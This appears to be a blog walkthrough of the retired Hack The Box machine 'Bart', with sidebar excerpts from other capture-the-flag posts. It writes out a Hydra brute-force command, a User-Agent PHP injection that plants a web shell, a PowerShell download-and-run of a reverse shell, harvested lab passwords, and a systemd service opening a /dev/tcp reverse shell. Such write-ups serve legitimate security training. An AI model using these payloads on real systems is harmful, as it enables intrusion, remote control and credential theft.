Skip to main content

HacktheBox - Bart - Retired

HacktheBox - Bart - Retired




Recon

I've been using threader3000 for a while to do my initial scanning on HTB, I've recently started to use a variant named threader3000 which can automatically run the nmap scan on the resulting open ports found.



Only port 80 open.


It is an IIS server, it also shows a redirect to http://forurm.bart.htb. Since it is IIS we can pretty safely assume this is a windows box.


Let's check it out.




Nothing…

This might just be a DNS resolution issue let's add forum.bart.htb to our /etc/hosts to see if that fixes this


We can use VI to add

10.10.10.81 forum.bart.htb




Now let's try this again.


Not much to go on here, just a list of employee names ( we will file that away for the future)



Let's run a directory brute force against the server and see if we can find anything interesting.






One of the results of the dirb attack is 


http://bart.htb/monitor/


Let's check that out.


A server monitor page, but it looks like it requires authentication.


Looks like this webapp is PHP Server Monitor v3.2.1


Let's google it and see what we can learn about it



We can try to look around for default logins and such… but I came up empty on that front.


Hey… There is a Forgot Password link there. I wonder what it does?


It asks for a username. Let's try with just test as  the username.



Ok we found some employee names on the forum.bart.htb site. Let's try some of those names


Samantha Brown

Daniel Simmons

Robert Hilton


These names are all listed in the Our Team section… But wait there's more.


In the latest News section, there is a post about Daniella Lamborghini being a new employee, let's make sure we include that name too.


I ran Cewl against the site too, I wanted to see if I might have missed any names.


Cewl is a crawler that pulls all the words off a website for you and displays just the list of words. I sent my results to a text file to make it easier to look through


cewl http://forum.bart.htb  > cewl.txt





Also from the Employee section we can see that the email address for the company are first initial.lastname@bart.htb


s.brown@bart.htb


So we can build out a quick list of what these employees email addresses probably are



s.brown@bart.thb

d.simmons@bart.htb

r.hilton@bart.htb

d.lamborghini@bart.htb



Let's try these as user names in the server monitor forgot password  starting with Mr. Hilton since he is in charge of the tech according to the meet the team page.



Nada… Let's go back to our cewl output.



There is one more name showing up that I can't find anywhere on the site… Harvey



Let's search for it in the source code for the site.


Found them, commented out in the employees section looks like a developer that might no longer be with the company



Harvey Potter….. No comment



So they would be h.pottter@bart.htb…… still not going to touch that name :)



Now if we try to to forgot password for the username harvey we get this message back



An email has been sent with password reset instructions. So the username Harvey is valid for this site.








Exploit




So now we can try to brute force Harvey's password using the cewl.txt we created earlier. Let's take a second and modify our cewl.txt to have 3 versions of the text found. The original, the text in all uppercase and the text in all lower case, just to make our lives a little easier. We can use translate to feed cewl.txt into a new file that converts it to these other options and then combine the lists.


To convert it to all upper we use.

tr '[:lower:]' '[:upper:]' < cewl.txt > cewl-upper.txt


To convert to lower we simple swap the translation around.

tr '[:upper:]' '[:lower:]' < cewl.txt > cewl-Lower.txt



Then we can append our original cewl.txt with these two files


cat ./cewl-Lower.txt >> .cewl.txt
cat ./cewl-Upper.txt >> cewl.txt


We can use Hydra to perform the attack but first let's start up burpsuite to make sure we can format our attack correctly.

Let's capture a bad login using burp suite.




Here we can start extracting what is needed to do our hydra attack.


User_name=harvey

User_password=test

action=login 


Since this site uses cookies we will need to add that in our hydra also, or it will not work correctly ( it will actually say that everything is a password, I learned this the hard way :) )


This takes a bit, so Let's up the amount of threads we are  using with hydra to 50


We just need to do the switch -t 50


We also need to know what happens and is displayed in the resulting failures to let hydra know what to filter on.



The information is incorrect


So our final hydra command should be..




hydra -t 50 -l harvey -P ./cewl.txt monitor.bart.htb http-post-form "/index.php:csrf=3409752aaae7cec9adf2eca6c9ac381d097f269a51652a689c29bbb670d129f6&~user_name=^USER^&user_password=^PASS^&action=login:F=incorrect:H=Cookie\: PHPSESSID=8ar4p17mgu9lfdgu392c6j6o8c"






OMG… this was taking forever so I switched tactics and went with an intruder sniper attack in burp.




Let's go back to burp and send our failed request over to intruder.






Once we click on the positions tab we can see that burp tried to determine the attack points for us and highlighted a bunch of the post request.




So let's hit clear to get back to nothing selected.



Now we will highlight just our password since that is the only thing we want to change with intruder and select add$




Now it has selected just the password for our attack, so now we will go over to the payloads tab and input our Cewl list.



Now, in paid version of burp you can load this the payloads from a file, but I'm using the community addition so I have to highlight all the words in my list, select copy and then use the paste function here to load the list



And now our attack is ready. You can see our payload list loaded up now.






Let's click on Start Attack




Now we will see the request and their response codes and length of the response.



Now we wait until it iterates over our payload list.


What we are looking for here, is either difference in either the status or length.


For every wrong password tried, it should essentially return the same error, which should be the same length. So we can look for results that aren't 3926 in length. 


After our attack has run( and it took a very long time to run… like hours for me)


We sort by status code to see if there is anything other than 200( which simply means OK)

Here we can see a status code of 302 (which is a redirect) for the password of potter so this might be the password we are looking for.










Let's try to login with Harvey:potter








Winner winner chicken dinner!!


Let's poke around in here and see what else we might find.


We can see a new subdomain here.



Internal-01.bart.htb


Let's add that to our hosts file and see what we might find there.




We got another login screen. Oi


The same user/pass we used for the Server Monitor doesn't work here, the password is not long enough ( it says we need 8 characters)


Let's through dirb at this new domain and see if we can find anything else interesting being served here.



Let's see if this is some sort of common chat program, just grab the last part of the URL


simple_chat/Login_form.php and pop it into google.


Looks like it might be a AJAX chat that is on github


https://github.com/magkopian/php-ajax-simple-chat/blob/master/README.md


It looks like there should be a registration page,



Let's see if we can verify this is the right thing.


If we start gobuster on it




gobuster dir -u http://internal-01.bart.htb/simple_chat -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt       





Looks like the directory structure is matching pretty well.


Let's try to bring up the registration page to see if we can create a new user




Well that's a wrench….


But wait, it looks like it did redirect us to regirester_form.php so we might still be on the right path.


If we look at the code for register_form.php


https://github.com/magkopian/php-ajax-simple-chat/blob/master/simple_chat/register_form.php


Here in the code it looks like it just needs two inputs, one a uname ( which we can assume is username) and another named passwd ( which we can assume is password)




So what if we just send those two in a POST to register.php, can we still add a new user?


Let's try to send a POST request using CURL. We just need to use the -d switch to supply our two fields we want to send.


https://www.educative.io/edpresso/how-to-perform-a-post-request-using-curl




curl -d "uname=circusmonkey&passwd=test1234" -X POST http://internal-01.bart.htb/simple_chat/register.php 




Now, we can try to login with these new credentials


circusmonkey

test1234


We are in…. Not much here though...let's poke around.


We can enter text and it shows up in the chat window..


There is a refresh and log link in the top right, let's check out the source code.





<div id="wrapper">
<!-- <div id="title"><h1>[DEV] Internal Chat</h1></div>
 <div id="title"><h1>Internal use only</h1></div> -->
 <div id="refresh_link"><a href=".">Refresh</a></div>
 <div id="log_link">
 <script>
 function saveChat() {
 // create a serialized object and send to log_chat.php. Once done hte XHR request, alert "Done"
 var xhr = new XMLHttpRequest();
 xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        alert(xhr.responseText);
    }
 }
 xhr.open('GET', 'http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey', true);
 xhr.send(null);
 alert("Done");
 }
 </script>
 <a href="#" onclick="saveChat()">Log</a>
 </div>
<!-- The format of one message:
 <div id="message_[message_id]">
 <a href="#">[username] </a>says:
 <p>[message_content]</p>
 </div>
 -->






Clicking on log button 


We get these messages

 






Let's see what happens when we go to the link in the code


http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey




We see the same 1 we say in the alert box.


Looks like there are a couple of values we can mess with here… filename and username


What happens if we change filename to the actual log.php itself


http://internal-01.bart.htb/log/log.php?filename=log.php&username=harvey



If we circle back to the txt file we can see it added our user agent to the log file




So now we have another thing we can fuss with..


The useragent.



Let's capture this in burp and edit our user agent.




I'm just going to set it to "Testy McTestFace"


It says ok on the response. And if we look at the txt file again we can see it put what we wanted in there.


So we can write whatever we want to this text file….. This is PHP so what if we send it some PHP?


Let's start with Hello world.


The PHP code for that is 


<?php echo "Hello World"; ?>



And we can put that in our user agent.


And we see this in the output.



Looks like we can use this to execute PHP


Let's try and ping out to our kali box 


Let's make the User Agent

<?PHP exec('ping 10.10.14.2') ?>





Before we send this GET request, let's setup tcpdump to alert us to ICMP traffic to our hackthebox VPN interface.


tcpdump -i tun0 -n icmp


-i we specificity which interface to listen on, in this case our VPN tunnel 

-n we can filter the traffic so it doesn't show us everything, we chose to filter for just ICMP (Ping)



Now we can send our request.



And here we can see the pings coming in from the server.


Now what?

Now we need to pop our shell.


For Grins and giggles I tried editing the name of log.php to log99.php in my request to see if we could write new files.


Turns out we can, the code execution still works.


If you are unfamiliar with php webshells. This is a great resource, and where I got my code for the next part 


https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/



So we can write our own php file to the server.


Let's use this to create php that will accept the argument called cmd


Let's change our User-Agent to


<?php system($_GET['cmd']);?>







GET /log/log.php?filename=log.php&username=harvey HTTP/1.1

Host: internal-01.bart.htb

User-Agent: <?php system($_GET['cmd']);?>

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://internal-01.bart.htb/

Cookie: PHPSESSID=kruk43eefa6bhj0hi93j76aqm8








After we send this GET we can then start pass command to the system using the cmd variable we created.


Let's start simple and pass dir since this is a windows box to make sure it working

GET /log/log.php?filename=log.txt&username=harvey&cmd=dir





And we got our directory listing back!



So we can send system commands using the variable we injected.


That's cool and all but what about a real shell?


We can try a number of things like putting netcat on here or sending over the nishangreverse shell script… our options are almost limitless



https://bad-jubies.github.io/RCE-NOW-WHAT/


This blog walks us through using our new cmd variable with PHP to download and invoke nishang  Invoke-PowerShellTcp.ps1



I'm going to deviate slightly from the blog post. Instead of stringing two powershell command to download and then execute the reverse shell. Let's modify the PS1 script to include the invocation at the end so it will self execute with the correct settings after its downloaded.



To do this we simply edit the Invoke-PowerShellTcp.ps1 script and add the invocation at the end of the script.




Invoke-PowerShellTcp -Reverse 10.10.14.12 -Port 5555



This is my VPN IP as well as the port I want the reverse shell to come in on. I saved this to my /bart folder.


Just a couple more steps before we can test this out.


We need to have a way to serve this PS1 file over to Bart, We need to setup our listener to catch our reverse shell, and we are going to need to encode our payload so it reaches bart the right way.


First let's use updog to serve the file up. It defaults to port 9090


updog


──(kali㉿kali)-[~/Desktop/HTB/bart]
└─$ /home/kali/.local/bin/updog                                                                                                                                                                                                      127 ⨯
[+] Serving /home/kali/Desktop/HTB/bart...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)


Ok next our listener.


nc -lnvp 5555



Now we need to format our command. The finally command we want run is



powershell.exe -ExecutionPolicy bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12:9090/Invoke-PowerShellTcp.ps1')


But we will need to URL encode this so it keeps all our formatting.


We can use Burp's built in convert function to handle this for us.



Now we should just need to hit send and hopefully catch our shell




woot !


We got our shell now we need to figure out what we need to do to escalate our privilege from  iusr


It's always a good idea to poking around in the directory you land end as well as directories around it, you might find creds in configuration files


Just like C:\inetpub\wwwroot\monitr\config.php

PS C:\inetpub\wwwroot\monitor> type config.php
<?php
define('PSM_DB_HOST', 'localhost');
define('PSM_DB_PORT', '3306');
define('PSM_DB_NAME', 'sysmon');
define('PSM_DB_USER', 'daniel');
define('PSM_DB_PASS', '?St4r1ng1sCr33py?');
define('PSM_DB_PREFIX', '_');
define('PSM_BASE_URL', 'http://monitor.bart.htb');


Looks like daniels password for this application is ?St4r1ng1sCr33py?


Maybe that will help us down the road

Type


It just so happens that is the same creds he uses to login to the monitor.bart.htb site



We can continue to poke around but no obvious path forward is revlieling its self.


Let's run winpeas on this to see if it can help us with a path.



First we need to copy winpeas.exe to our folder we are serving up with updog


If you don't have it grab a copy from their github


https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite


Then we can use poweshell to download it to a temp directory( Which doesn't exist so we need to make it first ( mkdir C:\temp)



Invoke-WebRequest -Uri "http://10.10.14.12:9090/winPEAS.exe" -OutFile "C:\temp\winPEAS.exe"


When we can execute C:\temp\winPEAS.exe


Once it' done executing this bit really grabs my attention

[+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found!!
    DefaultDomainName             :  DESKTOP-7I3S68E
    DefaultUserName               :  Administrator
    DefaultPassword               :  3130438f31186fbaf962f407711faddb




Auto login is present for the administrator account with their password!


Now if this were linux we could just SU and switch over to the administrator account.

I found this blog that looks like it fits perfect for what we want to do


https://davidhamann.de/2019/12/08/running-command-different-user-powershell/


powershell.exe -c "$user='WORKGROUP\John'; $pass='password123'; try { Invoke-Command -ScriptBlock { Get-Content C:\Users\John\Desktop\secret.txt } -ComputerName Server123 -Credential (New-Object System.Management.Automation.PSCredential $user,(ConvertTo-SecureString $pass -AsPlainText -Force)) } catch { echo $_.Exception.Message }" 2>&1

 

We will need to modify this a bit to use our credentials we found. I also want it to spawn a new reverse shell back to my kali box so we can full command execution.


Comments

Post a Comment

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more